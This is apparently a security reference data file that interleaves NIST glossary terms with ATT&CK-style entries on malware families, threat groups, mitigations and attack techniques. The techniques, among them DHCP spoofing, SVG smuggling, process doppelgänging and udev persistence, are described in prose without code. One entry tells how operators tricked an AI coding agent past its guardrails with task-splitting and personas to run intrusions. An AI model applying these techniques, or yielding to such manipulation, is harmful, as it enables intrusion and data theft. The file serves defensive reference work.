· is designed to run with elevated privilege or manage privileges;
· has direct or privileged access to networking or computing resources;
· is designed to control access to data or operational technology;
· performs a function critical to trust; or,
· operates outside of normal trust boundaries with privileged access.

Term: Kerberos
Definition: A network authentication protocol that is designed to provide strong authentication for client/server applications by using symmetric-key cryptography.

Term: <em>NV</em>
Definition: Nonce contributed by party V; a byte string.

Term: security control inheritance
Definition: A situation in which an information system or application receives protection from security controls (or portions of security controls) that are developed, implemented, assessed, authorized, and monitored by entities other than those responsible for the system or application; entities either internal or external to the organization where the system or application resides. See Common Control.

Name: Bankshot
Type: malware
Description: Bankshot is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, Lazarus Group used the Bankshot implant in attacks against the Turkish financial sector.

Name: Anthropic AI-orchestrated Campaign
Type: campaign
Description: The Anthropic AI-orchestrated Campaign was conducted in September 2025 by a likely China nexus espionage actor identified as GTG-1002. The Anthropic AI-orchestrated Campaign was a highly coordinated operation that manipulated Claude Code to perform reconnaissance, vulnerability discovery, exploitation, lateral movement, credential harvesting, data analysis, and exfiltration operations at approximately 30 entities in the technology, financial, chemical, and government sectors. During the Anthropic AI-orchestrated Campaign, human operators used Claude Code agents and Model Context Protocol (MCP) tools to automate cyber operations. Operators broke attacks into discrete tasks, used crafted prompts, and established personas to bypass AI guardrails, enabling the agents to execute the operations with minimal human involvement.

Term: Data Actions
Definition: System operations that process PII.

Term: <em>Cn</em>
Definition: Block of data representing the Ciphertext n

Name: Linfo
Type: malware
Description: Linfo is a rootkit trojan used by Elderwood to open a backdoor on compromised hosts.

Term: Information System Security Engineer
Definition: Individual assigned responsibility for conducting information system security engineering activities.

Term: public key certificate
Definition: A set of data that uniquely identifies an entity, contains the entity's public key and possibly other information, and is digitally signed by a trusted party, thereby binding the public key to the entity (e.g., using an X.509 certificate). Additional information in the certificate could specify how the key is used and its validity period.

Term: secret key
Definition: A single cryptographic key that is used with a symmetric (secret key) algorithm, is uniquely associated with one or more entities, and is not made public (i.e., the key is kept secret); a symmetric key is often called a secret key.

Term: <em>user_supplied_info</em>
Definition: Additional information that is provided by an entity when requesting a timestamp from a TTA.

Name: Replication Through Removable Media
Type: attack-pattern
Description: Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.

Mobile devices may also be used to infect PCs with malware if connected via USB. This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables. For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).

Term: Bit Length
Definition: The number of bits in a bit string (e.g., the bit length of the string 0110010101000011 is sixteen bits). The bit length of the empty (i.e., null) string is zero.

Term: Integrity authentication
Definition: See Integrity authentication.

Term: mechanism
Definition: A process or system that is used to produce a particular result.

Term: IoT Product Component
Definition: An IoT device or other digital equipment or service (e.g., backend, mobile app) used to create IoT products.

Name: Snip3
Type: malware
Description: Snip3 is a sophisticated crypter-as-a-service that has been used since at least 2021 to obfuscate and load numerous strains of malware including AsyncRAT, Revenge RAT, Agent Tesla, and NETWIRE.

Term: Simple Mail Transfer Protocol (SMTP)
Definition: An MTA protocol defined by IETF RFC 2821. SMTP is the most commonly used MTA protocol.

Term: key management
Definition: The activities involving the handling of cryptographic keys and other related security parameters (e.g., IVs and passwords) during the entire life cycle of the keys, including their generation, storage, establishment, entry and output, and destruction.

Term: TPP
Definition: The Venafi Machine Identity Protection platform used in the example implementation described in this practice guide.

Term: Random Bit Generator (RBG)
Definition: A device or algorithm that outputs a sequence of bits that appears to be statistically independent and unbiased. Also, see Random number generator.

Name: Saint Bot
Type: malware
Description: Saint Bot is a .NET downloader that has been used by Saint Bear since at least March 2021.

Term: hash function
Definition: A function that maps a bit string of arbitrary length to a fixed-length bit string. Approved hash functions satisfy the following properties:
One-way - It is computationally infeasible to find any input that maps to any pre-specified output; and
Collision resistant - It is computationally infeasible to find any two distinct inputs that map to the same output.

Term: event
Definition: Actions taken through the use of an information system or network that result in an actual or potentially adverse effect on an information system, network, and/or the information residing therein.

Term: <strong>Shall</strong>
Definition: This term is used to indicate a requirement of a Federal Information Processing Standard (FIPS) or a requirement that must be fulfilled to claim conformance to this Recommendation; note that shall may be coupled with not to become shall not.

Name: zwShell
Type: malware
Description: zwShell is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during Night Dragon.

Term: Transport Layer Security (TLS)
Definition: An authentication and security protocol widely implemented in browsers and web servers. SSL has been superseded by the newer Transport Layer Security (TLS) protocol; TLS 1.0 is effectively SSL version 3.1.

Term: access control
Definition: Process of granting access to information system resources only to authorized users, programs, processes, or other systems.

Term: IS
Definition: A discrete set of information resources organized for the collection, processing, maintenance, use, sharing, dissemination, or disposition of information. [Note: Information systems also include specialized systems such as industrial/process controls systems, telephone switching and private branch exchange (PBX) systems, and environmental control systems.]

Term: Open System
Definition: A system that allows entities from different enterprises to access information related to tags used in the system. Open systems use an inter-enterprise subsystem to share information between entities.

Name: Threat Group-1314
Type: intrusion-set
Description: Threat Group-1314 is an unattributed threat group that has used compromised credentials to log into a victim's remote access infrastructure.

Name: SplatCloak
Type: malware
Description: SplatCloak is a malware that disables EDR-related routines used by Windows Defender and Kaspersky to aid in evading detection. SplatCloak has been deployed by SplatDropper and is known to be leveraged by Mustang Panda since 2025.

Term: PEP
Definition: A network device on which policy decisions are carried out or enforced.

Term: Operational storage
Definition: The normal storage of operational keying material during its cryptoperiod.

Term: Pseudorandom function (PRF)
Definition: A function that can be used to generate output from a random seed such that the output is computationally indistinguishable from truly random output.

Name: DHCP Spoofing
Type: attack-pattern
Description: Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as Network Sniffing or Transmitted Data Manipulation.

DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients. The typical server-client interaction is as follows: 

1. The client broadcasts a `DISCOVER` message.

2. The server responds with an `OFFER` message, which includes an available network address. 

3. The client broadcasts a `REQUEST` message, which includes the network address offered. 

4. The server acknowledges with an `ACK` message and the client receives the network configuration parameters.

Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers. Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.

DHCPv6 clients can receive network configuration information without being assigned an IP address by sending a <code>INFORMATION-REQUEST (code 11)</code> message to the <code>All_DHCP_Relay_Agents_and_Servers</code> multicast address. Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.

Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, Service Exhaustion Flood) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool.

Term: <em>xj</em>
Definition: The total number of times that a given state occurs in the identified cycles. See Section 2.15 and 3.15.

Term: Decision or branch coverage
Definition: The percentage of branches that have been evaluated to both true and false by a test set.

Term: Derived PIV Credential
Definition: A credential issued based on proof of possession and control of the PIV Card, so as not to duplicate the identity proofing process as defined in [NIST SP 800-63-2]. A Derived PIV Credential token is a hardware or software based token that contains the Derived PIV Credential.

Term: authority
Definition: The organization responsible for producing the original security configuration guidance represented by the checklist.

Term: superuser
Definition: See privileged user.

Name: Use Alternate Authentication Material
Type: attack-pattern
Description: Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. 

Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.

Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through Credential Access techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.

Name: Audit
Type: course-of-action
Description: Auditing is the process of recording activity and systematically reviewing and analyzing the activity and system configurations. The primary purpose of auditing is to detect anomalies and identify potential threats or weaknesses in the environment. Proper auditing configurations can also help to meet compliance requirements. The process of auditing encompasses regular analysis of user behaviors and system logs in support of proactive security measures.

Auditing is applicable to all systems used within an organization, from the front door of a building to accessing a file on a fileserver. It is considered more critical for regulated industries such as, healthcare, finance and government where compliance requirements demand stringent tracking of user and system activates.This mitigation can be implemented through the following measures: 

System Audit:

- Use Case: Regularly assess system configurations to ensure compliance with organizational security policies.
- Implementation: Use tools to scan for deviations from established benchmarks.

Permission Audits:

- Use Case: Review file and folder permissions to minimize the risk of unauthorized access or privilege escalation.
- Implementation: Run access reviews to identify users or groups with excessive permissions.

Software Audits:

- Use Case: Identify outdated, unsupported, or insecure software that could serve as an attack vector.
- Implementation: Use inventory and vulnerability scanning tools to detect outdated versions and recommend secure alternatives.

Configuration Audits:

- Use Case: Evaluate system and network configurations to ensure secure settings (e.g., disabled SMBv1, enabled MFA).
- Implementation: Implement automated configuration scanning tools like SCAP (Security Content Automation Protocol) to identify non-compliant systems.

Network Audits:

- Use Case: Examine network traffic, firewall rules, and endpoint communications to identify unauthorized or insecure connections.
- Implementation: Utilize tools such as Wireshark, or Zeek to monitor and log suspicious network behavior.

Term: Security Executive Agent
Definition: Individual responsible for the development, implementation, and oversight of effective, efficient, and uniform policies and procedures that govern the conduct of investigations and adjudications for eligibility to access classified information and eligibility to hold a sensitive position in the Federal Government. In accordance with Executive Order 13467 (as amended), this individual is the Director of National Intelligence (DNI)

Name: BlackByte
Type: intrusion-set
Description: BlackByte is a ransomware threat actor operating since at least 2021. BlackByte is associated with several versions of ransomware also labeled BlackByte Ransomware. BlackByte ransomware operations initially used a common encryption key allowing for the development of a universal decryptor, but subsequent versions such as BlackByte 2.0 Ransomware use more robust encryption mechanisms. BlackByte is notable for operations targeting critical infrastructure entities among other targets across North America.

Name: Dtrack
Type: malware
Description: Dtrack is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. Dtrack shares similarities with the DarkSeoul campaign, which was attributed to Lazarus Group.

Name: SVG Smuggling
Type: attack-pattern
Description: Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files. SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include `<script>` tags that enable adversaries to include malicious JavaScript payloads. However, SVGs may appear less suspicious to users than other types of executable files, as they are often treated as image files. 

SVG smuggling can take a number of forms. For example, threat actors may include content that: 

* Assembles malicious payloads
* Downloads malicious payloads
* Redirects users to malicious websites
* Displays interactive content to users, such as fake login forms and download buttons.

SVG Smuggling may be used in conjunction with HTML Smuggling where an SVG with a malicious payload is included inside an HTML file. SVGs may also be included in other types of documents, such as PDFs.

Term: IM
Definition: a facility for exchanging messages in real-time with other people over the Internet and tracking the progress of the conversation.

Term: information exchange
Definition: Access to or the transfer of data outside of system authorization boundaries in order to accomplish a mission or business function.

Term: product cybersecurity capability
Definition: Cybersecurity features or functions that computing devices provide through their own technical means (i.e., device hardware and software).

Name: BlackByte 2.0 Ransomware
Type: malware
Description: BlackByte 2.0 Ransomware is a replacement for BlackByte Ransomware. Unlike BlackByte Ransomware, BlackByte 2.0 Ransomware does not have a common key for victim decryption. BlackByte 2.0 Ransomware remains uniquely associated with BlackByte operations.

Term: removable media device
Definition: A system component that can be inserted into and removed from a system and that is used to store information or data (e.g., text, video, audio, and/or image data). Such components are typically implemented on magnetic, optical, or solid-state devices (e.g., compact/digital video disks, flash/thumb drives, external solid-state drives, external hard disk drives, flash memory cards/drives that contain nonvolatile memory).

Term: Fresh Entropy
Definition: A bitstring output from an entropy source, an NRBG or a DRBG that has access to a Live Entropy Source that is being used to provide prediction resistance.

Term: nonce
Definition: A value used in security protocols that is never repeated with the same key. For example, nonces used as challenges in challenge-response authentication protocols must not be repeated until authentication keys are changed. Otherwise, there is a possibility of a replay attack. Using a nonce as a challenge is a different requirement than a random challenge, because a nonce is not necessarily unpredictable.

Term: Key-wrapping key
Definition: A symmetric key-encrypting key that is used to provide both confidentiality and integrity protection. Also see Key-encrypting key.

Term: senior agency official for privacy
Definition: The senior official, designated by the head of each agency, who has agency-wide responsibility for privacy, including implementation of privacy protections; compliance with Federal laws, regulations, and policies relating to privacy; management of privacy risks at the agency; and a central policy-making role in the agency's development and evaluation of legislative, regulatory, and other policy proposals.

Term: product owner
Definition: Person or organization responsible for the development, modification, operation, and/or final disposition of software or hardware used in an information system.

Term: security incident
Definition: An occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of a system or the information the system processes, stores, or transmits or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies.

Term: security criteria
Definition: Criteria related to a supplier’s ability to conform to security-relevant laws, directives, regulations, policies, or business processes; a supplier’s ability to deliver the requested product or service in satisfaction of the stated security requirements and in conformance with secure business practices; the ability of a mechanism, system element, or system to meet its security requirements; whether movement from one life cycle stage or process to another (e.g., to accept a baseline into configuration management, to accept delivery of a product or service) is acceptable in terms of security policy; how a delivered product or service is handled, distributed, and accepted; how to perform security verification and validation; or how to store system elements securely in disposal.

Term: Transport Layer
Definition: Layer of the TCP/IP protocol stack that is responsible for reliable connection-oriented or connectionless end-to-end communications.

Term: Retention period
Definition: The minimum amount of time that a key or other cryptographically related information should be retained in the archive.

Term: RBAC
Definition: Access control based on user roles (i.e., a collection of access authorizations a user receives based on an explicit or implicit assumption of a given role). Role permissions may be inherited through a role hierarchy and typically reflect the permissions needed to perform defined functions within an organization. A given role may apply to a single individual or to several individuals.

Name: Hi-Zor
Type: malware
Description: Hi-Zor is a remote access tool (RAT) that has characteristics similar to Sakula. It was used in a campaign named INOCNATION.

Term: ICCID
Definition: a unique and immutable identifier maintained within the SIM.

Term: Second byte of a two-byte status word
Definition: Second byte of a two-byte status word

Term: Media gateway
Definition: the interface between circuit switched networks and IP network. Media gateways handle analog/digital conversion, call origination and reception, and quality improvement functions such as compression or echo cancellation.

Term: high-impact system
Definition: An information system in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a FIPS PUB 199 potential impact value of high. 
Note: For National Security Systems, CNSSI No. 1253 does not adopt this FIPS PUB 200 high water mark across security objectives.

Term: False Match Rate (FMR)
Definition: False Match Rate (defined over single comparisons)

Term: Capability, Manage and Assess Risk
Definition: An ISCM capability that focuses on reducing the successful exploits of the other non-meta capabilities that occur because the risk management process fails to correctly identify and prioritize actions and investments needed to lower the risk profile.

Term: asymmetric cryptography
Definition: Encryption system that uses a public-private key pair for encryption and/or digital signature.

Term: digital signature
Definition: The output that results from the successful completion of a digital signature algorithm operating on data (e.g., a message) that is to be signed. When used appropriately, a digital signature can provide assurance of data integrity, origin authentication, and signatory non-repudiation. See [FIPS 186-3] for details.

Name: Reflection Amplification
Type: attack-pattern
Description: Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target. This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.

Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS and NTP, though the use of several others in the wild have been documented. In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.

Term: Minimalist Cryptography
Definition: Cryptography that can be implemented on devices with very limited memory and computing capabilities, such as RFID tags.

Term: data integrity
Definition: A property possessed by data items that have not been altered in an unauthorized manner since they were created, transmitted, or stored.

Term: Memorandum of Understanding or Agreement
Definition: A statement of intent between the participating organizations to work together and often states goals, objectives, or the purpose for the partnership; details the terms of and conditions for the agreement; and outlines the operations needed to achieve the goals or purpose.

Term: Archive
Definition: Noun: See Archive facility.

Name: Kerrdown
Type: malware
Description: Kerrdown is a custom downloader that has been used by APT32 since at least 2018 to install spyware from a server on the victim's network.

Term: accounting number
Definition: A number assigned to an individual item of COMSEC material at its point of origin to facilitate its handling and accounting.

Name: Network Sniffing
Type: attack-pattern
Description: Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as Name Resolution Poisoning and SMB Relay, can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.

Network sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Stealth activities. Adversaries may likely also utilize network sniffing during Adversary-in-the-Middle (AiTM) to passively gain additional knowledge about the environment.

In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to. Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic. The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.

On network devices, adversaries may perform network captures using Network Device CLI commands such as `monitor capture`.

Term: passive attack
Definition: An attack against an authentication protocol where the Attacker intercepts data traveling along the network between the Claimant and Verifier, but does not alter the data (i.e., eavesdropping).

Term: Key Management Plan
Definition: Documents how key management for current and/or planned cryptographic products and services will be implemented to ensure lifecycle key management support for cryptographic processes.

Term: digital signature
Definition: The result of applying two cryptographic functions (a hash function, followed by a digital signature function; see FIPS 186-3 for details). When the functions are properly implemented, the digital signature provides origin authentication, data integrity protection and signatory non-repudiation.

Term: hypervisor
Definition: See “hypervisor”.

Term: KBits
Definition: The bit length of the secret keying material.

Term: NC
Definition: A value used in security protocols that is never repeated with the same key. For example, nonces used as challenges in challenge-response authentication protocols must not be repeated until authentication keys are changed. Otherwise, there is a possibility of a replay attack. Using a nonce as a challenge is a different requirement than a random challenge, because a nonce is not necessarily unpredictable.

Term: code
Definition: System of communication in which arbitrary groups of letters, numbers, or symbols represent units of plain text of varying length.

Term: nonce
Definition: See Nonce

Term: Cyber Threat
Definition: Any circumstance or event with the potential to adversely impact organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, or the Nation through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service.

Term: hash function
Definition: A function that maps a bit string of arbitrary lenth to a fixed-length bit string.

Term: administrative incident (COMSEC)
Definition: A violation of procedures or practices dangerous to security that is not serious enough to jeopardize the integrity of a controlled cryptographic item (CCI), but requires corrective action to ensure the violation does not recur or possibly lead to a reportable COMSEC incident.

Term: level 3
Definition: The risk management level that implements ISCM for specific systems. Also refers to any element that is meant to be evaluated by Level 3 personnel.

Term: public key certificate
Definition: A set of data that uniquely identifies an entity, contains the entity's public key and possibly other information, and is digitally signed by a trusted party, thereby binding the public key to the entity. Additional information in the certificate could specify how the key is used and its cryptoperiod.

Term: message authentication code (MAC)
Definition: A cryptographic checksum on data that is designed to reveal both accidental errors and intentional modifications of the data.

Name: Misdat
Type: malware
Description: Misdat is a backdoor that was used in Operation Dust Storm from 2010 to 2011.

Name: Udev Rules
Type: attack-pattern
Description: Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.

Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.

Term: <strong>Shall</strong>
Definition: This term is used to indicate a requirement of a Federal Information Processing Standard (FIPS) or a requirement that must be fulfilled to claim conformance to this Recommendation. Note that shall may be coupled with not to become shall not.

Name: EXOTIC LILY
Type: intrusion-set
Description: EXOTIC LILY is a financially motivated group that has been closely linked with Wizard Spider and the deployment of ransomware including Conti and Diavol. EXOTIC LILY may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021.

Term: RTU
Definition: Special purpose data acquisition and control unit designed to support DCS and SCADA remote stations. RTUs are field devices often equipped with network capabilities, which can include wired and wireless radio interfaces to communicate to the supervisory controller. Sometimes PLCs are implemented as field devices to serve as RTUs; in this case, the PLC is often referred to as an RTU.

Term: False Positive
Definition: An alert that incorrectly indicates that malicious activity is occurring.

Term: Personal Firewall
Definition: A software program that monitors communications between a PC and other computers and blocks communications that are unwanted.

Term: Prime number
Definition: An integer greater than 1 that has no positive integer factors other than 1 and itself.

Term: critical infrastructure
Definition: Systems and assets, whether physical or virtual, so vital to the United States that the incapacity or destruction of such systems and assets would have a debilitating impact on security, national economic security, national public health or safety, or any combination of those matters.

Name: Process Doppelgänging
Type: attack-pattern
Description: Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. 

Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. 

Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. 

Adversaries may abuse TxF to a perform a file-less variation of Process Injection. Similar to Process Hollowing, process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as <code>NtUnmapViewOfSection</code>, <code>VirtualProtectEx</code>, and <code>SetThreadContext</code>. 

Process Doppelgänging is implemented in 4 steps :

* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
* Load – Create a shared section of memory and load the malicious executable.
* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
* Animate – Create a process from the tainted section of memory and initiate execution.

This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process.

Term: Informative Reference Developer
Definition: A person, team, or organization that creates an Informative Reference and submits it to the OLIR Program.

Term: Key information
Definition: Information about a key that includes the keying material and associated metadata relating to that key.

Term: Biometric On-Card Comparison (OCC)
Definition: A one-to-one comparison of fingerprint biometric data records transmitted to the PIV Card with a biometric reference previously stored on the PIV Card. In this Standard, OCC is used as a means of performing card activation and as part of Biometric On- Card Comparison Authentication (OCC-AUTH).

Term: closed storage
Definition: The storage of classified information in properly secured General Services Administration-approved security containers.

Term: enterprise information technology
Definition: The application of computers and telecommunications equipment to store, retrieve, transmit, and manipulate data, in the context of a business or other enterprise.

Term: capability
Definition: A combination of mutually reinforcing controls implemented by technical means, physical means, and procedural means. Such controls are typically selected to achieve a common information security or privacy purpose.

Name: Reg
Type: tool
Description: Reg is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. 

Utilities such as Reg are known to be used by persistent threats.

Term: assessment objective
Definition: A set of determination statements that expresses the desired outcome for the assessment of a security control or control enhancement.

Term: probe
Definition: A technique that attempts to access a system to learn something about the system.

Name: Account Use Policies
Type: course-of-action
Description: Account Use Policies help mitigate unauthorized access by configuring and enforcing rules that govern how and when accounts can be used. These policies include enforcing account lockout mechanisms, restricting login times, and setting inactivity timeouts. Proper configuration of these policies reduces the risk of brute-force attacks, credential theft, and unauthorized access by limiting the opportunities for malicious actors to exploit accounts. This mitigation can be implemented through the following measures:

Account Lockout Policies:

- Implementation: Configure account lockout settings so that after a defined number of failed login attempts (e.g., 3-5 attempts), the account is locked for a specific time period (e.g., 15 minutes) or requires an administrator to unlock it.
- Use Case: This prevents brute-force attacks by limiting how many incorrect password attempts can be made before the account is temporarily disabled, reducing the likelihood of an attacker successfully guessing a password.

Login Time Restrictions:

- Implementation: Set up login time policies to restrict when users or groups can log into systems. For example, only allowing login during standard business hours (e.g., 8 AM to 6 PM) for non-administrative accounts.
- Use Case: This prevents unauthorized access outside of approved working hours, where login attempts might be more suspicious or harder to monitor. For example, if an account that is only supposed to be active during the day logs in at 2 AM, it should raise an alert or be blocked.

Inactivity Timeout and Session Termination:

- Implementation: Enforce session timeouts after a period of inactivity (e.g., 10-15 minutes) and require users to re-authenticate if they wish to resume the session.
- Use Case: This policy prevents attackers from hijacking active sessions left unattended. For example, if an employee walks away from their computer without locking it, an attacker with physical access to the system would be unable to exploit the session.

Password Aging Policies:

- Implementation: Enforce password aging rules, requiring users to change their passwords after a defined period (e.g., 90 days) and ensure passwords are not reused by maintaining a password history.
- Use Case: This limits the risk of compromised passwords being used indefinitely. Regular password changes make it more difficult for attackers to reuse stolen credentials.

Account Expiration and Deactivation:

- Implementation: Configure user accounts, especially for temporary or contract workers, to automatically expire after a set date or event. Accounts that remain unused for a specific period should be deactivated automatically.
- Use Case: This prevents dormant accounts from becoming an attack vector. For example, an attacker can exploit unused accounts if they are not properly monitored or deactivated.

**Tools for Implementation**:

- Group Policy Objects (GPOs) in Windows: To enforce account lockout thresholds, login time restrictions, session timeouts, and password policies.
- Identity and Access Management (IAM) solutions: For centralized management of user accounts, session policies, and automated deactivation of accounts.
- Security Information and Event Management (SIEM) platforms: To monitor and alert on unusual login activity, such as failed logins or out-of-hours access attempts.
- Multi-Factor Authentication (MFA) Tools: To further enforce secure login attempts, preventing brute-force or credential stuffing attacks.

Term: Deterministic Random Bit Generator
Definition: See Deterministic Random Bit Generator.

Name: PlugX
Type: malware
Description: PlugX is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.

Term: negative risk
Definition: Any circumstance or event with the potential to adversely impact organizational operations.

Term: least significant bit(s)
Definition: The right-most bit(s) of a bit string.

Term: Unbind
Definition: To deterministically transform a binding into its logical-form construct.

Term: memorized secret
Definition: A type of authenticator comprised of a character string intended to be memorized or memorable by the subscriber, permitting the subscriber to demonstratesomething they knowas part of an authentication process.

Name: AppleJeus
Type: malware
Description: AppleJeus is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. AppleJeus has been used by Lazarus Group, targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. AppleJeus has been used to distribute the FALLCHILL RAT.

Term: Call Processor
Definition: component that sets up and monitors the state of calls, and provides phone number translation, user authorization, and coordination with media gateways.

Term: key pair
Definition: A set of two keys with the property that one key can be made public, while the other key must be kept private. In this publication, this could refer to either the (encapsulation key, decapsulation key) key pair of a KEM or the (encryption key, decryption key) key pair of a public-key encryption (PKE) scheme.

Term: mitigation
Definition: The temporary reduction or lessening of the impact of a vulnerability or the likelihood of its exploitation.

Name: SHUTTERSPEED
Type: malware
Description: SHUTTERSPEED is a backdoor used by APT37.

Term: sanitization
Definition: Process to remove information from media such that data recovery is not possible. It includes removing all classified labels, markings, and activity logs.

Term: RA
Definition: The process of identifying risks to agency operations (including mission, functions, image, or reputation), agency assets, or individuals by determining the probability of occurrence, the resulting impact, and additional security controls that would mitigate this impact. Part of risk management, synonymous with risk analysis, and incorporates threat and vulnerability analyses.

Term: Capability, Security
Definition: A combination of mutually-reinforcing security controls (i.e., safeguards and countermeasures) implemented by technical means (i.e., functionality in hardware, software, and firmware), physical means (i.e., physical devices and protective measures), and procedural means (i.e., procedures performed by individuals).

Term: Universal Statistical Test
Definition: The purpose of the test is to detect whether or not the sequence can be significantly compressed without loss of information. A compressible sequence is considered to be non­ random.

Term: Data Encryption Algorithm
Definition: The Data Encryption Algorithm specified in FIPS 46-3

Term: Focal Document Element
Definition: Any number and combination of organizational concepts (e.g., Functions, Categories, Subcategories, Controls, Control Enhancements) of a Focal Document.

Term: Public Information
Definition: Any information, regardless of form or format that an agency discloses, disseminates, or makes available to the public.

Name: Non-Standard Encoding
Type: attack-pattern
